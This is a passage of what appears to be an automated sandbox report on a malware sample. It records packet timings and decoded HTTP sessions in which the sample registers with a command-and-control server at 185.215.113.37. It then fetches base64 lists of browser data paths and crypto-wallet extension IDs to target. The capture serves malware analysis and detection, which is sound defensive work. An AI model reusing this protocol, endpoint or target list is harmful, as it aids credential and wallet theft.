Sep 26, 2024 18:27:17.354022026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.354036093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.354041100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.354051113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.354064941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.354079008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.354085922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.354099035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.354113102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.354115963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.354126930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.354134083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.354142904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.354156017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.354157925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.354171038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.354185104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.354193926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.354197979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.354235888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.354254961 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.355695963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.355710983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.355725050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.355737925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.355751991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.355766058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.355777979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.355779886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.355792999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.355811119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.355824947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.355825901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.355839968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.355854034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.355854034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.355870008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.355885029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.355895042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.355899096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.355915070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.355921984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.355957985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.358222961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.358237982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.358251095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.358267069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.358299017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.358335018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:18.121191025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:18.121222019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:18.126362085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:18.126457930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:19.020327091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:19.020479918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:19.175231934 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:19.183825016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:19.404495001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:19.404571056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:19.404953957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:19.405009031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:19.497513056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:19.497585058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:19.500756025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:19.500835896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:19.511781931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:19.519556046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:19.744299889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:19.744337082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:19.744358063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:19.744427919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:19.744462013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:19.757230997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:19.762101889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:20.491151094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:20.491235971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:20.525197983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:20.530111074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:20.751987934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:20.752162933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:20.753473997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:20.761244059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:21.478564024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:21.478749990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:25.757570028 CEST	49730	80	192.168.2.4	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.37	80	7420	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 18:27:02.279654980 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Sep 26, 2024 18:27:03.027650118 CEST	203	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:02 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 26, 2024 18:27:03.042732954 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJKJJDBKEGIECAAECFH Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4a 4a 44 42 4b 45 47 49 45 43 41 41 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 44 36 34 32 44 43 37 45 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4a 4a 44 42 4b 45 47 49 45 43 41 41 45 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 4b 4a 4a 44 42 4b 45 47 49 45 43 41 41 45 43 46 48 2d 2d 0d 0a Data Ascii: ------JKJKJJDBKEGIECAAECFHContent-Disposition: form-data; name="hwid"F9D642DC7E231817704571------JKJKJJDBKEGIECAAECFHContent-Disposition: form-data; name="build"save------JKJKJJDBKEGIECAAECFH--
Sep 26, 2024 18:27:03.282198906 CEST	407	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:03 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 7a 46 68 4f 44 6b 31 4d 6a 45 32 59 6a 41 33 4e 44 4a 6b 4e 7a 55 79 5a 47 55 32 4d 7a 55 33 4d 54 4a 6b 5a 44 55 7a 4e 47 55 7a 4e 32 45 32 4d 7a 68 69 5a 6d 51 77 5a 54 67 77 4e 57 4e 68 4e 44 49 77 5a 6a 64 6a 4d 54 6b 32 4f 47 55 78 4e 44 56 68 4e 44 45 33 4e 7a 6b 79 4f 54 45 79 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MzFhODk1MjE2YjA3NDJkNzUyZGU2MzU3MTJkZDUzNGUzN2E2MzhiZmQwZTgwNWNhNDIwZjdjMTk2OGUxNDVhNDE3NzkyOTEyfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwxfHlibmNiaHlsZXBtZXw=
Sep 26, 2024 18:27:03.296380997 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJEBKKEGDBFIIEBFHIEH Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 42 4b 4b 45 47 44 42 46 49 49 45 42 46 48 49 45 48 2d 2d 0d 0a Data Ascii: ------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------IJEBKKEGDBFIIEBFHIEHContent-Disposition: form-data; name="message"browsers------IJEBKKEGDBFIIEBFHIEH--
Sep 26, 2024 18:27:03.517503023 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:03 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 26, 2024 18:27:03.517560959 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 26, 2024 18:27:03.519190073 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGHIIJDGHCBFIECBKEGH Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 61 38 39 35 32 31 36 62 30 37 34 32 64 37 35 32 64 65 36 33 35 37 31 32 64 64 35 33 34 65 33 37 61 36 33 38 62 66 64 30 65 38 30 35 63 61 34 32 30 66 37 63 31 39 36 38 65 31 34 35 61 34 31 37 37 39 32 39 31 32 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 2d 2d 0d 0a Data Ascii: ------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="token"31a895216b0742d752de635712dd534e37a638bfd0e805ca420f7c1968e145a417792912------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="message"plugins------BGHIIJDGHCBFIECBKEGH--
Sep 26, 2024 18:27:03.741457939 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 16:27:03 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 26, 2024 18:27:03.741506100 CEST	224	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdk
Sep 26, 2024 18:27:03.741543055 CEST	1236	IN	Data Raw: 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 68 70 62 57 35 72 62 6d 39 38 4d 58 77 77 66 44 42 38 51 58 56 79 62 79 42 58 59 57 78 73 5a 58 51 6f 54 57 6c 75 59 53 42 51 63 6d 39 30 62 32 4e 76 62 43 6c 38 59 32 35 74 59 57 Data Ascii: b2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZhbGljYWpvb2x
Sep 26, 2024 18:27:03.741579056 CEST	1236	IN	Data Raw: 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d 6c 6c 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d Data Ascii: Z2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamt
Sep 26, 2024 18:27:03.741635084 CEST	1236	IN	Data Raw: 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 Data Ascii: fDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J
Sep 26, 2024 18:27:03.741674900 CEST	272	IN	Data Raw: 62 32 52 6f 61 57 56 76 62 58 42 6c 62 47 39 75 59 32 5a 75 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 Data Ascii: b2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1
Sep 26, 2024 18:27:03.741708040 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 76 63 47 5a 6e 5a 57 78 74 59 32 31 69 61 57 46 71 59 57 31 6c 63 47 35 74 62 47 39 70 61 6d 4a 77 62 32 78 6c 61 57 46 74 59 58 77 78 66 44 42 38 4d 48 78 4f 61 57 64 6f 64 47 78 35 49 46 64 68 62 47 78 6c 64 48 Data Ascii: IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXB
Sep 26, 2024 18:27:03.741743088 CEST	668	IN	Data Raw: 62 57 68 68 5a 6e 77 78 66 44 42 38 4d 48 78 4e 59 57 64 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47 78 6c 64 48 78 74 61 33 42 6c 5a 32 70 72 59 6d 78 72 61 32 56 6d 59 57 4e 6d 62 6d 31 72 59 57 70 6a 61 6d 31 68 59 6d 6c 71 61 47 4e 73 5a 33 Data Ascii: bWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGV
